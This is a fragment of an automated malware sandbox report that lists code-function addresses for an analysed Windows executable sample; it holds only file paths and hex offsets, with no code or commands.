            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A03A8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3BA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A13B4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4BB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2BD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A53E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9BE0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A03E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3BF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5003
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9018
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A101C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A082F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A083C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4834
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9048
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A305C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9056
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1078
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A508A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A109C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A50C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A08D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4907
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5110
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4116
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0924
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1124
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A113F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5168
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1163
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4970
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A19A9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A19BC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A51B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A49FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A69F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0E24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4E38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A463C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A664C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8E54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4E78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0E70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4698
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2E96
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6694
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A36AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4EA7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8EB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4ED0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A66EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A46E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F04
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2F18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F2C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8726
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A473C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8F34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F55
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F79
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8F7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3F88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2F80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5F80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4FAC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0FB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A47DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2FDC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A77EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2C24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0430
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0C4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6442
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A646C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1C7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3C7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A64D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CDC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0CEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A44FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8D1B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6520
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9D20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4D36
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6537
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4554
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4D90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A65A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DBB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4DD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A65EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0DE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3DFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A45F2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563A49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569AFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560BF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566442
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005686C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565F4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560703
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569056
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056305C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569048
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561078
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056101C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569018
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565003
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564834
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056083C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056082F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005608D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005650C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056109C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056508A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564970
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561163
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565168
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564116
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565110
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564907
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056113F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560924
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561124
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005669F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005649FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005651B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562A50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562A5D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561259
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565224
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005692D4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005652C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562AF4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005612E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564AE1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563A80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005612A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564B5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056135C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563B44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560378
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565310
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056131B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562B34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560335
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562BD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563BF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005603E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569BE0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005653E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562B84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056538C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005613B4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564BB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563BA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005603A8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560C4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561C7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563C7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056646C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560430
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562C24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CDC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005664D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005644FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560CEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C98
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564CA4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564554
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568D1B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564D36
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566537
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566520
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569D20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564DD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568DD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005645F2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563DFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560DE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005665EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564D90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056158E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005615BC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568DBB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005665A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568E54
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056664C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561670
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560E70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564E78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561604
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056463C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564E38
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560E24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005646E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005666EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562E96
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566694
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564698
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568EB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005636AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564F73
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568F7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562F18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F04
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568F34
